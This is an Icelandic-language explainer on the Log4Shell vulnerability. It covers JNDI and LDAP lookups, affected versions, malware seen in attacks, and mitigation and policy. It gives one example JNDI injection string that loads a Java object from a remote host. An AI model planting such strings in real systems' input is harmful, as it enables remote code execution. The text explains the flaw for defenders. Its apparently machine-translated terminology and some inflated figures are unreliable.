Efnisyfirlit[Fela][Sýna]
Seint í nóvember 2021 afhjúpuðum við mikla ógn við netöryggi. Þessi misnotkun myndi hugsanlega hafa áhrif á milljónir tölvukerfa um allan heim.
Þetta er leiðarvísir um Log4j varnarleysið og hvernig hönnunargalli sem gleymst hefur að gera yfir 90% af tölvuþjónustu heimsins opin fyrir árás.
Apache Log4j er opinn uppspretta Java-undirstaða skógarhöggunarforrit þróað af Apache Software Foundation. Upphaflega skrifað af Ceki Gülcü árið 2001, það er nú hluti af Apache Logging Services, verkefni Apache Software Foundation.
Fyrirtæki um allan heim nota Log4j bókasafnið til að gera innskráningu á forritum sínum kleift. Reyndar er Java bókasafnið svo alls staðar nálægt að þú getur fundið það í forritum frá Amazon, Microsoft, Google og fleirum.
Áberandi bókasafnsins þýðir að allir hugsanlegir gallar í kóðanum gætu gert milljónir tölva opnar fyrir reiðhestur. Þann 24. nóvember 2021, a skýjaöryggi Rannsakandi sem starfaði fyrir Alibaba uppgötvaði hræðilegan galla.
Log4j veikleikinn, einnig þekktur sem Log4Shell, hefur verið óséður síðan 2013. Varnarleysið gerði illgjarnum aðilum kleift að keyra kóða á viðkomandi kerfum sem keyra Log4j. Það var birt opinberlega þann 9. desember 2021
Iðnaðarsérfræðingar kalla Log4Shell gallann stærsta varnarleysi í seinni tíð.
Í vikunni eftir að varnarleysið var birt, fundu netöryggissveitir milljónir árása. Sumir vísindamenn sáu meira að segja meira en hundrað árásir á mínútu.
Hvernig virkar það?
Til að skilja hvers vegna Log4Shell er svo hættulegt þurfum við að skilja hvers það er fært.
Log4Shell varnarleysið gerir kleift að framkvæma handahófskennda kóða, sem þýðir í grundvallaratriðum að árásarmaður getur keyrt hvaða skipun eða kóða sem er á markvél.
Hvernig nær það þessu fram?
Fyrst þurfum við að skilja hvað JNDI er.
Java Naming and Directory Interface (JNDI) er Java þjónusta sem gerir Java forritum kleift að uppgötva og fletta upp gögnum og auðlindum með nafni. Þessar skráaþjónustur eru mikilvægar vegna þess að þær bjóða upp á skipulagt safn af gögnum sem forritarar geta auðveldlega vísað í þegar þeir búa til forrit.
JNDI getur notað ýmsar samskiptareglur til að fá aðgang að tiltekinni skrá. Ein af þessum samskiptareglum er Lightweight Directory Access Protocol, eða LDAP.
Þegar þú skráir streng, log4j framkvæmir strengjaskipti þegar þeir hitta tjáningu formsins ${prefix:name}
.
Til dæmis, Text: ${java:version}
gæti verið skráður sem Texti: Java útgáfa 1.8.0_65. Þessar útfærslur eru algengar.
Við getum líka haft orðatiltæki eins og Text: ${jndi:ldap://example.com/file}
sem notar JNDI kerfið til að hlaða Java hlut frá vefslóð í gegnum LDAP samskiptareglur.
Þetta hleður í raun gögnum sem koma frá þeirri vefslóð inn í vélina. Allir hugsanlegir tölvuþrjótar geta hýst skaðlegan kóða á opinberri vefslóð og beðið eftir því að vélar sem nota Log4j skrái hann.
Þar sem innihald annálaskilaboða inniheldur notendastýrð gögn geta tölvuþrjótar sett inn sínar eigin JNDI tilvísanir sem vísa á LDAP netþjóna sem þeir stjórna. Þessir LDAP netþjónar geta verið fullir af skaðlegum Java hlutum sem JNDI getur keyrt í gegnum varnarleysið.
Það sem gerir þetta verra er að það skiptir ekki máli hvort forritið er þjónn-hlið eða skjólstæðingshlið forrit.
Svo lengi sem það er leið fyrir skógarhöggsmanninn að lesa illgjarn kóða árásarmannsins, er forritið enn opið fyrir hetjudáð.
Hver er fyrir áhrifum?
Varnarleysið hefur áhrif á öll kerfi og þjónustur sem nota APache Log4j, með útgáfur 2.0 til og með 2.14.1.
Nokkrir öryggissérfræðingar benda á að varnarleysið gæti haft áhrif á fjölda forrita sem nota Java.
Gallinn uppgötvaðist fyrst í Minecraft tölvuleiknum í eigu Microsoft. Microsoft hefur hvatt notendur sína til að uppfæra Java útgáfu Minecraft hugbúnaðarins til að koma í veg fyrir áhættu.
Jen Easterly, forstjóri netöryggis- og innviðaöryggisstofnunarinnar (CISA), segir að söluaðilar hafi mikil ábyrgð til að koma í veg fyrir að illgjarnir aðilar notfæri sér þennan varnarleysi.
"Salendur ættu líka að hafa samskipti við viðskiptavini sína til að tryggja að notendur viti að vara þeirra inniheldur þennan varnarleysi og ættu að forgangsraða hugbúnaðaruppfærslum."
Að sögn eru árásirnar þegar hafnar. Symantec, fyrirtæki sem útvegar netöryggishugbúnað, hefur fylgst með mismunandi fjölda árásarbeiðna.
Hér eru nokkur dæmi um tegundir árása sem vísindamenn hafa uppgötvað:
- Botnnet
Botnet eru net tölva sem eru undir stjórn eins árásaraðila. Þeir hjálpa til við að framkvæma DDoS árásir, stela gögnum og öðrum svindli. Vísindamenn fylgdust með Muhstik botnetinu í skeljaforskriftum sem hlaðið var niður af Log4j hagnýtingu.
- XMRig Miner Trojan
XMRig er opinn uppspretta dulritunargjaldmiðilsnáma sem notar örgjörva til að ná í Monero táknið. Netglæpamenn geta sett upp XMRig á tæki fólks svo þeir geti notað vinnslukraft sinn án vitundar þeirra.
- Khonsari Ransomware
Ransomware vísar til tegundar spilliforrita sem ætlað er að dulkóða skrár í tölvu. Árásarmenn geta síðan krafist greiðslu gegn því að þeir fái aðgang aftur að dulkóðuðu skránum. Vísindamenn uppgötvuðu Khonsari lausnarhugbúnaðinn í Log4Shell árásum. Þeir miða á Windows netþjóna og nýta sér .NET ramma.
Hvað gerist næst?
Sérfræðingar spá því að það gæti tekið marga mánuði eða jafnvel ár að laga ringulreiðina sem Log4J varnarleysið hefur í för með sér.
Þetta ferli felur í sér að uppfæra öll kerfi sem verða fyrir áhrifum með pjattri útgáfu. Jafnvel þótt öll þessi kerfi séu lagfærð, þá er enn yfirvofandi hætta á hugsanlegum bakdyrum sem tölvuþrjótar kunna að hafa þegar bætt við gluggann sem þjónar voru opnir fyrir árás.
Margir lausnir og mótvægisaðgerðir eru til til að koma í veg fyrir að þessi villu noti forrit. Nýja Log4j útgáfan 2.15.0-rc1 breytti ýmsum stillingum til að draga úr þessum varnarleysi.
Allir eiginleikar sem nota JNDI verða sjálfgefnir óvirkir og fjarleit hefur einnig verið takmarkað. Ef slökkt er á uppflettingareiginleikanum á Log4j uppsetningunni þinni mun það hjálpa til við að draga úr hættunni á mögulegri hetjudáð.
Utan Log4j er enn þörf fyrir víðtækari áætlun til að koma í veg fyrir opinn hetjudáð.
Fyrr í maí gaf Hvíta húsið út an framkvæmdastjóri röð sem miðar að því að bæta netöryggi landsmanna. Það innihélt ákvæði um hugbúnaðarskrá (SBOM) sem var í meginatriðum formlegt skjal sem innihélt lista yfir alla hluti sem þarf til að byggja forritið.
Þetta felur í sér hluta eins og opinn uppspretta pakka, ósjálfstæði og API sem notuð eru til þróunar. Þó hugmyndin um SBOMs sé gagnleg fyrir gagnsæi, mun það virkilega hjálpa neytendum?
Það getur verið of mikið vesen að uppfæra ósjálfstæði. Fyrirtæki geta bara valið að greiða hvaða sekt sem er frekar en að hætta að eyða tíma í að finna aðra pakka. Kannski munu þessar SBOMs aðeins vera gagnlegar ef þeirra umfang er takmarkað frekar.
Niðurstaða
Log4j málið er meira en bara tæknilegt vandamál fyrir stofnanir.
Viðskiptaleiðtogar verða að vera meðvitaðir um hugsanlega áhættu sem gæti átt sér stað þegar netþjónar þeirra, vörur eða þjónusta treysta á kóða sem þeir sjálfir halda ekki við.
Að treysta á opinn uppspretta og þriðja aðila forrit fylgir alltaf einhverri áhættu. Fyrirtæki ættu að íhuga að útfæra aðferðir til að draga úr áhættu áður en nýjar ógnir koma í ljós.
Mikið af vefnum byggir á opnum hugbúnaði sem er viðhaldið af þúsundum sjálfboðaliða um allan heim.
Ef við viljum halda vefnum öruggum ættu stjórnvöld og fyrirtæki að fjárfesta í fjármögnun opins uppspretta og netöryggisstofnana eins og CISA.
Skildu eftir skilaboð